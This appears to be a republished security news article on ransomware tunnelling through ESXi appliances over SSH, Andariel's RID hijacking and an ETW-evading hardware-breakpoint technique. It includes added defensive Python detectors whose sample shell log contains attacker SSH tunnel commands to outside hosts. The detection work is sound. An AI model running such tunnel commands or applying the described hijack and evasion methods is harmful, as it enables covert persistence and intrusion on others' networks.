Ptechhub
Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations

By Ravie Lakshmanan, The Hacker News | January 28, 2025 | Ransomware / Threat Intelligence

Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also leveraging that access to repurpose the appliances as a conduit for tunnelling traffic to command-and-control (C2) infrastructure while staying under the radar.

“ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely,” Sygnia researchers Zhongyuan Hau (Aaron) and Ren Jie Yow said in a report published last week.

“Threat actors use these platforms by adopting ‘living-off-the-land’ techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers and the compromised environment.”

The idea is to blend into legitimate traffic and establish long-term persistence on the compromised network with little to no detection by security controls.

The cybersecurity company said that in many of its incident response engagements, ESXi systems were compromised either with valid admin credentials or by exploiting a known vulnerability to bypass authentication. The threat actors then set up a tunnel using SSH or another tool with equivalent functionality.

“Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.

Sygnia has also highlighted the challenges of monitoring ESXi logs, emphasizing the need to configure log forwarding so that all relevant events are captured in one place for forensic investigation.

To detect attacks that involve the use of SSH tunneling on ESXi appliances, organizations are advised to review the following four log files:

  • /var/log/shell.log (ESXi shell activity log)
  • /var/log/hostd.log (Host agent log)
  • /var/log/auth.log (authentication log)
  • /var/log/vobd.log (VMware observer daemon log)
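As an added example (not code from the Sygnia report or this article), the following Python detection logic runs over constructed shell.log and auth.log lines written in the shape of ESXi's log format. It flags ssh invocations from the ESXi shell that carry tunnel flags (-R, -D, -L, -w), flags accepted SSH logins from sources outside a management allowlist, and correlates the two: a host that both logged in and is the endpoint of an outbound tunnel is the pattern described above. The sample lines, the allowlist and all function names are assumptions.

```python
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample lines in the shape of ESXi /var/log/shell.log and /var/log/auth.log
# entries (not real incident data). Newer ESXi releases may insert a syslog level token
# such as "In(14)" before the process name; the regexes below accept either form.
SHELL_LOG = """\
2025-01-20T09:58:11Z shell[2101300]: [root]: esxcli system version get
2025-01-20T10:02:45Z shell[2101300]: [root]: ssh -fN -R 1080 -o ServerAliveInterval=60 svc@203.0.113.10
2025-01-20T10:03:12Z In(14) shell[2101300]: [root]: ssh -D 9050 -fN admin@198.51.100.7
2025-01-20T10:05:40Z shell[2101300]: [root]: ssh -i /tmp/.k backup@192.0.2.5
"""

AUTH_LOG = """\
2025-01-20T09:57:50Z sshd[2101290]: Accepted keyboard-interactive/pam for root from 10.10.5.21 port 51022 ssh2
2025-01-20T10:02:30Z sshd[2101298]: Accepted publickey for root from 203.0.113.10 port 40122 ssh2
2025-01-20T10:05:01Z sshd[2101301]: Failed password for root from 203.0.113.10 port 40130 ssh2
"""

SHELL_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?:\w+\(\d+\)\s+)?shell\[(?P<pid>\d+)\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$"
)
AUTH_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?:\w+\(\d+\)\s+)?sshd\[(?P<pid>\d+)\]:\s+Accepted\s+(?P<method>\S+)"
    r"\s+for\s+(?P<user>\S+)\s+from\s+(?P<src>\S+)\s+port\s+(?P<port>\d+)"
)

# -R/-D/-L forward ports and -w opens a tun device: any of these turns the host into a relay.
TUNNEL_FLAGS = frozenset("RDLw")


@dataclass
class Finding:
    ts: str
    kind: str          # "ssh_tunnel" | "ssh_outbound" | "ssh_login_unexpected_source"
    host: str          # remote endpoint (tunnel target or login source)
    flags: set = field(default_factory=set)


def ssh_tunnel_flags(cmd):
    """Return the tunnel-related flags of an ssh command line, or None if it is not ssh."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return None
    idx = next((i for i, t in enumerate(tokens) if t.rsplit("/", 1)[-1] == "ssh"), None)
    if idx is None:
        return None
    flags = set()
    for tok in tokens[idx + 1:]:
        if tok.startswith("-") and not tok.startswith("--"):
            flags.update(tok[1:])      # combined short flags such as -fN
    return flags & TUNNEL_FLAGS


def ssh_target(cmd):
    """Best-effort remote endpoint: the first user@host token, else the last token."""
    tokens = shlex.split(cmd)
    return next((t for t in tokens if "@" in t), tokens[-1])


def detect_tunnels(shell_text):
    """Every ssh run from the ESXi shell; tunnel flags raise it to 'ssh_tunnel'."""
    findings = []
    for line in shell_text.splitlines():
        m = SHELL_RE.match(line)
        if not m:
            continue
        flags = ssh_tunnel_flags(m["cmd"])
        if flags is None:
            continue
        kind = "ssh_tunnel" if flags else "ssh_outbound"
        findings.append(Finding(m["ts"], kind, ssh_target(m["cmd"]), flags))
    return findings


def detect_logins(auth_text, allowed_sources):
    """Accepted SSH logins whose source is not an approved management address."""
    return [
        Finding(m["ts"], "ssh_login_unexpected_source", m["src"])
        for m in map(AUTH_RE.match, auth_text.splitlines())
        if m and m["src"] not in allowed_sources
    ]


def correlate(shell_text, auth_text, allowed_sources):
    """Hosts that both logged in over SSH and are the endpoint of an outbound tunnel."""
    tunnel_hosts = {f.host.split("@")[-1] for f in detect_tunnels(shell_text) if f.kind == "ssh_tunnel"}
    login_hosts = {f.host for f in detect_logins(auth_text, allowed_sources)}
    return sorted(tunnel_hosts & login_hosts)


if __name__ == "__main__":
    for f in detect_tunnels(SHELL_LOG) + detect_logins(AUTH_LOG, {"10.10.5.21"}):
        print(f)
    print("login + tunnel from the same host:", correlate(SHELL_LOG, AUTH_LOG, {"10.10.5.21"}))
```

This only works if the logs leave the host: point the ESXi syslog at a collector (esxcli system syslog config set --loghost=... followed by esxcli system syslog reload) and run the parsers there, since an attacker with root on the appliance can truncate local files.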

Andariel Employs RID Hijacking

The development comes as the AhnLab Security Intelligence Center (ASEC) detailed an attack mounted by the North Korea-linked Andariel group that involves the use of a technique known as Relative Identifier (RID) hijacking to covertly modify the Windows Registry so that a guest or low-privileged account is granted administrative permissions at its next login.

The persistence method is stealthy because regular accounts are not subjected to the same level of surveillance as the administrator account, allowing threat actors to perform malicious actions while remaining undetected.

However, in order to perform RID hijacking, the adversary must have already compromised a machine and gained administrative or SYSTEM privileges, as it requires changing the RID value of the standard account to that of the Administrator account (500).

In the attack chain documented by ASEC, the threat actor is said to have created a new account and assigned it administrator privileges using this approach, after first obtaining SYSTEM privileges with tools such as PsExec and JuicyPotato.

“The threat actor then added the created account to the Remote Desktop Users group and Administrators group using the ‘net localgroup’ command,” the company said. “When an account is added to the Remote Desktop Users group, the account can be accessed by using RDP.”

“Once the RID value has been changed, the Windows OS recognizes the account created by the threat actor as having the same privileges as the target account, enabling privilege escalation.”
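An added example, not from the ASEC report: a hunt for the artifact the technique leaves behind. Each local account lives under HKLM\SAM\SAM\Domains\Account\Users\&lt;RID as 8 hex digits&gt;, and the account's RID is also stored inside the binary F value there (public RID-hijacking write-ups place it at offset 0x30 as a little-endian DWORD; that offset is an assumption carried in RID_OFFSET). A hijacked account keeps its original key name but carries a different embedded RID, so a key-name/F-value mismatch is the detection. The F blobs below are constructed and minimal; real ones are longer.

```python
import struct

# Offset of the 32-bit little-endian RID inside the SAM "F" value, as described in public
# RID-hijacking research (assumption carried here; adjust if your hive differs).
RID_OFFSET = 0x30
ADMIN_RID = 500          # built-in Administrator
GUEST_RID = 501          # built-in Guest
BUILTIN_RIDS = {ADMIN_RID, GUEST_RID}


def make_f_value(rid, length=0x50):
    """Constructed minimal F blob: zeros except the RID field (real F values are longer)."""
    blob = bytearray(length)
    struct.pack_into("<I", blob, RID_OFFSET, rid)
    return bytes(blob)


def embedded_rid(f_value):
    """RID stored inside the F value."""
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def key_rid(key_name):
    """Users subkey names are the RID as 8 uppercase hex digits, e.g. '000001F4' == 500."""
    return int(key_name, 16)


def find_rid_hijacks(users):
    """users maps Users subkey name -> F value bytes.

    Returns (key_rid, embedded_rid, verdict) for every account whose embedded RID
    differs from the RID in its key name; pointing at 500/501 is the classic hijack."""
    hits = []
    for name, f in users.items():
        k, e = key_rid(name), embedded_rid(f)
        if k == e:
            continue
        verdict = "hijack_to_builtin" if e in BUILTIN_RIDS else "rid_mismatch"
        hits.append((k, e, verdict))
    return hits


# Constructed hive contents: two untouched built-in accounts and one attacker-created
# account (RID 1001) whose F value has been rewritten to point at RID 500.
SAMPLE_USERS = {
    "000001F4": make_f_value(ADMIN_RID),
    "000001F5": make_f_value(GUEST_RID),
    "000003E9": make_f_value(ADMIN_RID),
}

if __name__ == "__main__":
    for k, e, verdict in find_rid_hijacks(SAMPLE_USERS):
        print(f"account RID {k} carries embedded RID {e}: {verdict}")
```

Reading the real F values needs SYSTEM on the live host (the SAM hive is not readable by administrators) or an offline copy of the hive parsed with a registry-hive library; the comparison itself is what matters. Because the same actor also added the account to Administrators and Remote Desktop Users with net localgroup, pair this check with Security event 4732 (a member was added to a security-enabled local group).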

New Technique for EDR Evasion

In related news, it has also been discovered that an approach based on hardware breakpoints could be leveraged to bypass detections built on Event Tracing for Windows (ETW), the mechanism that logs events raised by user-mode applications and kernel-mode drivers.

This entails setting the CPU debug registers through the native Windows function NtContinue instead of SetThreadContext, so that the ETW events EDRs parse to flag suspicious activity are never emitted, thereby sidestepping telemetry that relies on SetThreadContext.

“By leveraging hardware breakpoints at the CPU level, attackers can hook functions and manipulate telemetry in userland without direct kernel patching — challenging traditional defenses,” Praetorian researcher Rad Kawar said.

“This matters because it highlights a technique adversaries can use to evade and maintain stealth while implementing ‘patchless’ hooks that prevent AMSI scanning and avoid ETW logging.”

Copyright © 2025 | Powered By Porpholio